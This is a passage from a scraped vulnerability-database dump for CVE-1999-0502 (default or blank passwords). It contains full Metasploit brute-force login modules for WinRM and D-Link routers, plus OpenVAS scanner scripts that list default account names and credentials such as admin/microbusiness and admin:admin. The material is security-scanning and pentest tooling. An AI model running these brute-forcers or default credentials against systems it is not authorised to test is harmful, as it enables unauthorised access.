)\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::WinRM.new(\n host: ip,\n port: rport,\n proxies: datastore[\"PROXIES\"],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 10,\n framework: framework,\n framework_module: self,\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n\n end\n\n\n def test_request\n return winrm_wql_msg(\"Select Name,Status from Win32_Service\")\n end\nend\n\n=begin\nTo set the AllowUncrypted option:\nwinrm set winrm/config/service @{AllowUnencrypted=\"true\"}\n=end\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/winrm/winrm_login.rb"}, {"lastseen": "2017-11-10T23:43:48", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module attempts to authenticate to different D-Link HTTP management services. It has been tested successfully on D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645 Hardware revision A devices. It is possible that this module also works with other models.", "reporter": "Rapid7", "published": "2013-04-04T19:41:10", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb", "type": "metasploit", "title": "D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-08-27T01:01:10", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/HTTP/DLINK_DIR_SESSION_CGI_HTTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested successfully on D-Link DIR-300 Hardware revision B,\n D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645\n Hardware revision A devices. It is possible that this module also works with other\n models.\n },\n 'Author' =>\n [\n 'hdm',\t#http_login module\n 'Michael Messner <devnull[at]s3cur1ty.de>'\t#dlink login included\n ],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('USERNAME', [ false, \"Username for authentication (default: admin)\",\"admin\" ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_pass.txt\") ]),\n ])\n\n deregister_options('HttpUsername', 'HttpPassword')\n end\n\n def target_url\n proto = \"http\"\n if rport == 443 or ssl\n proto = \"https\"\n end\n \"#{proto}://#{rhost}:#{rport}#{@uri.to_s}\"\n end\n\n def is_dlink?\n response = send_request_cgi({\n 'uri' => @uri,\n 'method' => 'GET'\n })\n\n if response and response.headers['Server'] and response.headers['Server'] =~ /Linux,\\ HTTP\\/1.1,\\ DIR-.*Ver\\ .*/\n return true\n else\n return false\n end\n end\n\n def run_host(ip)\n\n @uri = \"/session.cgi\"\n\n if is_dlink?\n vprint_good(\"#{target_url} - D-Link device detected\")\n else\n vprint_error(\"#{target_url} - D-Link device doesn't detected\")\n return\n end\n\n print_status(\"#{target_url} - Attempting to login\")\n\n each_user_pass { |user, pass|\n do_login(user, pass)\n }\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: (ssl ? 'https' : 'http'),\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n # default to user=admin without password (default on most dlink routers)\n def do_login(user='admin', pass='')\n vprint_status(\"#{target_url} - Trying username:'#{user}' with password:'#{pass}'\")\n\n response = do_http_login(user,pass)\n result = determine_result(response)\n\n if result == :success\n print_good(\"#{target_url} - Successful login '#{user}' : '#{pass}'\")\n\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)\n\n return :next_user\n else\n vprint_error(\"#{target_url} - Failed to login as '#{user}'\")\n return\n end\n end\n\n def do_http_login(user,pass)\n begin\n response = send_request_cgi({\n 'uri' => @uri,\n 'method' => 'POST',\n 'vars_post' => {\n \"REPORT_METHOD\" => \"xml\",\n \"ACTION\" => \"login_plaintext\",\n \"USER\" => user,\n \"PASSWD\" => pass,\n \"CAPTCHA\" => \"\"\n }\n })\n return if response.nil?\n return if (response.code == 404)\n\n return response\n rescue ::Rex::ConnectionError\n vprint_error(\"#{target_url} - Failed to connect to the web server\")\n return nil\n end\n end\n\n def determine_result(response)\n return :abort if response.nil?\n return :abort unless response.kind_of? Rex::Proto::Http::Response\n return :abort unless response.code\n if response.body =~ /\\<RESULT\\>SUCCESS\\<\\/RESULT\\>/\n return :success\n end\n return :fail\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb"}], "openvas": [{"lastseen": "2018-09-01T23:35:55", "references": [], "pluginID": "136141256231011000", "description": "This host has one or more accounts with a blank \npassword. Please see the data section for a list \nof these accounts.", "edition": 3, "reporter": "This script is Copyright (C) 2001 H D Moore", "published": "2005-11-03T00:00:00", "title": "MPEi/X Default Accounts", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Default Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231011000", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011000", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: DDI_MPEiX_FTP_Accounts.nasl 9348 2018-04-06 07:01:19Z cfischer $\n# Description: MPEi/X Default Accounts\n#\n# Authors:\n# H D Moore <hdmoore@digitaldefense.net>\n#\n# Copyright:\n# Copyright (C) 2001 H D Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"This host has one or more accounts with a blank \npassword. Please see the data section for a list \nof these accounts.\";\n\ntag_solution = \"Apply complex passwords to all accounts.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11000\"); \n script_version(\"$Revision: 9348 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:01:19 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-1999-0502\");\n name = \"MPEi/X Default Accounts\";\n\n script_name(name);\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n \n \n script_copyright(\"This script is Copyright (C) 2001 H D Moore\");\n family = \"Default Accounts\";\n\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\n\n#\n# default account listing\n#\naccounts[0] = \"OPERATOR.SYS\";\naccounts[1] = \"MANAGER.SYS\";\naccounts[2] = \"SPECTRUM.CU1\";\naccounts[3] = \"CU1.DBA\";\naccounts[4] = \"CU1.MANAGER\";\naccounts[5] = \"CU1.MGR\";\naccounts[6] = \"CUTEST1.MANAGER\";\naccounts[7] = \"CUTEST1.MGR\";\naccounts[8] = \"CUTRAIN.MANAGER\";\naccounts[9] = \"CUTRAIN.MGR\";\naccounts[10] = \"SUPPORT.FIELD\";\naccounts[11] = \"SUPPORT.MANAGER\";\naccounts[12] = \"SUPPORT.MGR\";\naccounts[13] = \"SUPPORT.OPERATOR\";\naccounts[14] = \"SYS.MANAGER\";\naccounts[15] = \"SYS.MGR\";\naccounts[16] = \"SYS.NWIXUSER\";\naccounts[17] = \"SYS.OPERATOR\";\naccounts[18] = \"SYS.PCUSER\";\naccounts[19] = \"SYS.RSBCMON\";\naccounts[20] = \"SYSMGR.MANAGER\";\naccounts[21] = \"SYSMGR.MGR\";\naccounts[22] = \"TELAMON.MANAGER\";\naccounts[23] = \"TELAMON.MGR\";\naccounts[24] = \"TELESUP.FIELD\";\naccounts[25] = \"TELESUP.MAIL\";\naccounts[26] = \"TELESUP.MANAGER\";\naccounts[27] = \"TELESUP.MGR\";\naccounts[28] = \"VECSL.MANAGER\";\naccounts[29] = \"VECSL.MGR\";\naccounts[30] = \"VESOFT.MANAGER\";\naccounts[31] = \"VESOFT.MGR\";\naccounts[32] = \"BIND.MANAGER\";\naccounts[33] = \"BIND.MGR\";\naccounts[34] = \"CAROLIAN.MANAGER\";\naccounts[35] = \"CAROLIAN.MGR\";\naccounts[36] = \"CCC.MANAGER\";\naccounts[37] = \"CCC.MGR\";\naccounts[38] = \"CCC.SPOOL\";\naccounts[39] = \"CNAS.MGR\";\naccounts[40] = \"COGNOS.MANAGER\";\naccounts[41] = \"COGNOS.MGR\";\naccounts[42] = \"COGNOS.OPERATOR\";\naccounts[43] = \"CONV.MANAGER\";\naccounts[44] = \"CONV.MGR\";\naccounts[45] = \"HPLANMANAGER.MANAGER\";\naccounts[46] = \"HPLANMANAGER.MGR\";\naccounts[47] = \"HPNCS.FIELD\";\naccounts[48] = \"HPNCS.MANAGER\";\naccounts[49] = \"HPNCS.MGR\";\naccounts[50] = \"HPOFFICE.ADVMAIL\";\naccounts[51] = \"HPOFFICE.DESKMON\";\naccounts[52] = \"HPOFFICE.MAIL\";\naccounts[53] = \"HPOFFICE.MAILMAN\";\naccounts[54] = \"HPOFFICE.MAILROOM\";\naccounts[55] = \"HPOFFICE.MAILTRCK\";\naccounts[56] = \"HPOFFICE.MANAGER\";\naccounts[57] = \"HPOFFICE.MGR\";\naccounts[58] = \"HPOFFICE.OPENMAIL\";\naccounts[59] = \"HPOFFICE.PCUSER\";\naccounts[60] = \"HPOFFICE.SPOOLMAN\";\naccounts[61] = \"HPOFFICE.WP\";\naccounts[62] = \"HPOFFICE.X400FER\";\naccounts[63] = \"HPOPTMGT.MANAGER\";\naccounts[64] = \"HPOPTMGT.MGR\";\naccounts[65] = \"HPPL85.FIELD\";\naccounts[66] = \"HPPL85.MANAGER\";\naccounts[67] = \"HPPL85.MGR\";\naccounts[68] = \"HPPL87.FIELD\";\naccounts[69] = \"HPPL87.MANAGER\";\naccounts[70] = \"HPPL87.MGR\";\naccounts[71] = \"HPPL89.FIELD\";\naccounts[72] = \"HPPL89.MANAGER\";\naccounts[73] = \"HPPL89.MGR\";\naccounts[74] = \"HPSKTS.MANAGER\";\naccounts[75] = \"HPSKTS.MGR\";\naccounts[76] = \"HPWORD.MANAGER\";\naccounts[77] = \"HPWORD.MGR\";\naccounts[78] = \"INFOSYS.MANAGER\";\naccounts[79] = \"INFOSYS.MGR\";\naccounts[80] = \"ITF3000.MANAGER\";\naccounts[81] = \"ITF3000.MGR\";\naccounts[82] = \"JAVA.MANAGER\";\naccounts[83] = \"JAVA.MGR\";\naccounts[84] = \"RJE.MANAGER\";\naccounts[85] = \"RJE.MGR\";\naccounts[86] = \"ROBELLE.MANAGER\";\naccounts[87] = \"ROBELLE.MGR\";\naccounts[88] = \"SNADS.MANAGER\";\naccounts[89] = \"SNADS.MGR\";\n\n#\n# The script code starts here\n#\n\n\n# open the connection\nport = get_kb_item(\"Services/ftp\");\nif(!port)port = 21;\nif(!get_port_state(port))exit(0);\n\nbanner = get_ftp_banner(port:port);\n\n# check for HP ftp service\nif(\"HP ARPA FTP\" >< banner)\n{\n # do nothing\n} else {\n exit(0);\n}\n\nsoc = open_sock_tcp(port);\nif(!soc)exit(0);\nd = ftp_recv_line(socket:soc);\n\nCRLF = raw_string(0x0d, 0x0a);\ncracked = string(\"\");\n\nfor(i=0; accounts[i]; i = i +1)\n{\n username = accounts[i];\n user = string(\"USER \", username, CRLF); \n \n send(socket:soc, data:user);\n resp = ftp_recv_line(socket:soc);\n \n if (\"230 User logged on\" >< resp)\n {\n cracked = string(cracked, username, \"\\n\");\n }\n}\nftp_close(soc);\n\nif (strlen(cracked))\n{\n report = string(\"These accounts have no passwords:\\n\\n\", cracked);\n security_message(port:port, data:report);\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:35:49", "references": [], "pluginID": "136141256231012641", "description": "The remote host is a Pirelli AGE mB (microBusiness) router with its\n default password set (admin/microbusiness).", "edition": 4, "reporter": "Copyright (C) 1999 Anonymous", "published": "2005-11-03T00:00:00", "title": "Default password router Pirelli AGE mB", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2018-04-23T00:00:00", "id": "OPENVAS:136141256231012641", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231012641", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: pirelli_router_default_password.nasl 9567 2018-04-23 13:22:46Z cfischer $\n#\n# Default password router Pirelli AGE mB\n#\n# Authors:\n# Anonymous\n#\n# Copyright:\n# Copyright (C) 1999 Anonymous\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.12641\");\n script_version(\"$Revision: 9567 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-23 15:22:46 +0200 (Mon, 23 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-1999-0502\");\n script_name(\"Default password router Pirelli AGE mB\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 1999 Anonymous\");\n script_family(\"Default Accounts\");\n script_dependencies(\"telnetserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_tag(name:\"solution\", value:\"Telnet to this router and set a password immediately.\");\n\n script_tag(name:\"summary\", value:\"The remote host is a Pirelli AGE mB (microBusiness) router with its\n default password set (admin/microbusiness).\");\n\n script_tag(name:\"impact\", value:\"An attacker could telnet to it and reconfigure it to lock the owner out\n and to prevent him from using his Internet connection, and do bad things.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"default_account.inc\");\ninclude(\"telnet_func.inc\");\n\n# If optimize_test = no\nif( get_kb_item( \"default_credentials/disable_default_account_checks\" ) ) exit( 0 );\n\nport = get_telnet_port( default:23 );\n\nbanner = get_telnet_banner( port:port );\nif( ! banner || \"USER:\" >!< banner ) exit( 0 );\n\n#First try as Admin\nsoc = open_sock_tcp( port );\nif( soc ) {\n\n r = recv_until( socket:soc, pattern:\"(USER:|ogin:)\" );\n if ( \"USER:\" >!< r ) {\n close( soc );\n exit( 0 );\n }\n\n s = string( \"admin\\r\\nmicrobusiness\\r\\n\" );\n send( socket:soc, data:s );\n r = recv_until( socket:soc, pattern:\"Configuration\" );\n close( soc );\n\n if( r && \"Configuration\" >< r ) {\n security_message( port:port );\n exit( 0 );\n }\n}\n\n#Second try as User (reopen soc because wrong pass disconnect)\nsoc = open_sock_tcp( port );\nif( soc ) {\n\n r = recv_until( socket:soc, pattern:\"(USER:|ogin:)\" );\n if ( \"USER:\" >!< r ) {\n close( soc );\n exit( 0 );\n }\n\n s = string( \"user\\r\\npassword\\r\\n\" );\n send( socket:soc, data:s );\n r = recv_until( socket:soc, pattern:\"Configuration\" );\n close( soc );\n\n if( r && \"Configuration\" >< r ) {\n security_message( port:port );\n }\n}\n\nexit( 0 );", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:35:50", "references": [], "pluginID": "136141256231011208", "description": "This host is running the Netscape Enterprise Server. The Administrative\n interface for this web server, which operates on port 8888/TCP, is using\n the default username and password of 'admin'.", "edition": 4, "reporter": "This script is Copyright (C) 2003 Digital Defense Inc.", "published": "2005-11-03T00:00:00", "title": "Netscape Enterprise Default Administrative Password", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:136141256231011208", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011208", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: DDI_Netscape_Enterprise_Default_Administrative_Password.nasl 6695 2017-07-12 11:17:53Z cfischer $\n#\n# Netscape Enterprise Default Administrative Password\n#\n# Authors:\n# Forrest Rae <forrest.rae@digitaldefense.net>\n#\n# Copyright:\n# Copyright (C) 2003 Digital Defense Inc.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11208\");\n script_version(\"$Revision: 6695 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 13:17:53 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-1999-0502\");\n script_name(\"Netscape Enterprise Default Administrative Password\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2003 Digital Defense Inc.\");\n script_family(\"Default Accounts\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"Netscape_iPlanet/banner\");\n script_require_ports(\"Services/www\", 8888);\n\n tag_summary = \"This host is running the Netscape Enterprise Server. The Administrative\n interface for this web server, which operates on port 8888/TCP, is using\n the default username and password of 'admin'.\";\n\n tag_impact = \"An attacker can use this to reconfigure the web server, cause a denial\n of service condition, or gain access to this host.\";\n\n tag_solution = \"Please assign the web administration console a difficult to guess\n password.\";\n\n script_tag(name:\"solution\", value:tag_solution);\n script_tag(name:\"summary\", value:tag_summary);\n script_tag(name:\"impact\", value:tag_impact);\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:8888 );\n\nbanner = get_http_banner( port:port );\n\nif( ! banner || ( \"Netscape\" >!< banner && \"iPlanet\" >!< banner ) ) exit( 0 );\n\nurl = \"/https-admserv/bin/index\";\nreq = http_get( item:url, port:port );\nreq = req - string( \"\\r\\n\\r\\n\" );\n# HTTP auth = \"admin:admin\"\nreq = string( req, \"\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\n\\r\\n\" );\nres = http_keepalive_send_recv( port:port, data:req );\n\nif( \"Web Server Administration Server\" >< res && \"index?tabs\" >< res ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report);\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-08T11:44:11", "references": [], "pluginID": "11000", "description": "This host has one or more accounts with a blank \npassword. Please see the data section for a list \nof these accounts.", "edition": 2, "reporter": "This script is Copyright (C) 2001 H D Moore", "published": "2005-11-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "MPEi/X Default Accounts", "type": "openvas", "naslFamily": "Default Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2017-12-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=11000", "id": "OPENVAS:11000", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: DDI_MPEiX_FTP_Accounts.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: MPEi/X Default Accounts\n#\n# Authors:\n# H D Moore <hdmoore@digitaldefense.net>\n#\n# Copyright:\n# Copyright (C) 2001 H D Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"This host has one or more accounts with a blank \npassword. Please see the data section for a list \nof these accounts.\";\n\ntag_solution = \"Apply complex passwords to all accounts.\";\n\nif(description)\n{\n script_id(11000); \n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-1999-0502\");\n name = \"MPEi/X Default Accounts\";\n\n script_name(name);\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n \n \n script_copyright(\"This script is Copyright (C) 2001 H D Moore\");\n family = \"Default Accounts\";\n\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\n\n#\n# default account listing\n#\naccounts[0] = \"OPERATOR.SYS\";\naccounts[1] = \"MANAGER.SYS\";\naccounts[2] = \"SPECTRUM.CU1\";\naccounts[3] = \"CU1.DBA\";\naccounts[4] = \"CU1.MANAGER\";\naccounts[5] = \"CU1.MGR\";\naccounts[6] = \"CUTEST1.MANAGER\";\naccounts[7] = \"CUTEST1.MGR\";\naccounts[8] = \"CUTRAIN.MANAGER\";\naccounts[9] = \"CUTRAIN.MGR\";\naccounts[10] = \"SUPPORT.FIELD\";\naccounts[11] = \"SUPPORT.MANAGER\";\naccounts[12] = \"SUPPORT.MGR\";\naccounts[13] = \"SUPPORT.OPERATOR\";\naccounts[14] = \"SYS.MANAGER\";\naccounts[15] = \"SYS.MGR\";\naccounts[16] = \"SYS.NWIXUSER\";\naccounts[17] = \"SYS.OPERATOR\";\naccounts[18] = \"SYS.PCUSER\";\naccounts[19] = \"SYS.RSBCMON\";\naccounts[20] = \"SYSMGR.MANAGER\";\naccounts[21] = \"SYSMGR.MGR\";\naccounts[22] = \"TELAMON.MANAGER\";\naccounts[23] = \"TELAMON.MGR\";\naccounts[24] = \"TELESUP.FIELD\";\naccounts[25] = \"TELESUP.MAIL\";\naccounts[26] = \"TELESUP.MANAGER\";\naccounts[27] = \"TELESUP.MGR\";\naccounts[28] = \"VECSL.MANAGER\";\naccounts[29] = \"VECSL.MGR\";\naccounts[30] = \"VESOFT.MANAGER\";\naccounts[31] = \"VESOFT.MGR\";\naccounts[32] = \"BIND.MANAGER\";\naccounts[33] = \"BIND.MGR\";\naccounts[34] = \"CAROLIAN.MANAGER\";\naccounts[35] = \"CAROLIAN.MGR\";\naccounts[36] = \"CCC.MANAGER\";\naccounts[37] = \"CCC.MGR\";\naccounts[38] = \"CCC.SPOOL\";\naccounts[39] = \"CNAS.MGR\";\naccounts[40] = \"COGNOS.MANAGER\";\naccounts[41] = \"COGNOS.MGR\";\naccounts[42] = \"COGNOS.OPERATOR\";\naccounts[43] = \"CONV.MANAGER\";\naccounts[44] = \"CONV.MGR\";\naccounts[45] = \"HPLANMANAGER.MANAGER\";\naccounts[46] = \"HPLANMANAGER.MGR\";\naccounts[47] = \"HPNCS.FIELD\";\naccounts[48] = \"HPNCS.MANAGER\";\naccounts[49] = \"HPNCS.MGR\";\naccounts[50] = \"HPOFFICE.ADVMAIL\";\naccounts[51] = \"HPOFFICE.DESKMON\";\naccounts[52] = \"HPOFFICE.MAIL\";\naccounts[53] = \"HPOFFICE.MAILMAN\";\naccounts[54] = \"HPOFFICE.MAILROOM\";\naccounts[55] = \"HPOFFICE.MAILTRCK\";\naccounts[56] = \"HPOFFICE.MANAGER\";\naccounts[57] = \"HPOFFICE.MGR\";\naccounts[58] = \"HPOFFICE.OPENMAIL\";\naccounts[59] = \"HPOFFICE.PCUSER\";\naccounts[60] = \"HPOFFICE.SPOOLMAN\";\naccounts[61] = \"HPOFFICE.WP\";\naccounts[62] = \"HPOFFICE.X400FER\";\naccounts[63] = \"HPOPTMGT.MANAGER\";\naccounts[64] = \"HPOPTMGT.MGR\";\naccounts[65] = \"HPPL85.FIELD\";\naccounts[66] = \"HPPL85.MANAGER\";\naccounts[67] = \"HPPL85.MGR\";\naccounts[68] = \"HPPL87.FIELD\";\naccounts[69] = \"HPPL87.MANAGER\";\naccounts[70] = \"HPPL87.MGR\";\naccounts[71] = \"HPPL89.FIELD\";\naccounts[72] = \"HPPL89.MANAGER\";\naccounts[73] = \"HPPL89.MGR\";\naccounts[74] = \"HPSKTS.MANAGER\";\naccounts[75] = \"HPSKTS.MGR\";\naccounts[76] = \"HPWORD.MANAGER\";\naccounts[77] = \"HPWORD.MGR\";\naccounts[78] = \"INFOSYS.MANAGER\";\naccounts[79] = \"INFOSYS.MGR\";\naccounts[80] = \"ITF3000.MANAGER\";\naccounts[81] = \"ITF3000.MGR\";\naccounts[82] = \"JAVA.MANAGER\";\naccounts[83] = \"JAVA.MGR\";\naccounts[84] = \"RJE.MANAGER\";\naccounts[85] = \"RJE.MGR\";\naccounts[86] = \"ROBELLE.MANAGER\";\naccounts[87] = \"ROBELLE.MGR\";\naccounts[88] = \"SNADS.MANAGER\";\naccounts[89] = \"SNADS.MGR\";\n\n#\n# The script code starts here\n#\n\n\n# open the connection\nport = get_kb_item(\"Services/ftp\");\nif(!port)port = 21;\nif(!get_port_state(port))exit(0);\n\nbanner = get_ftp_banner(port:port);\n\n# check for HP ftp service\nif(\"HP ARPA FTP\" >< 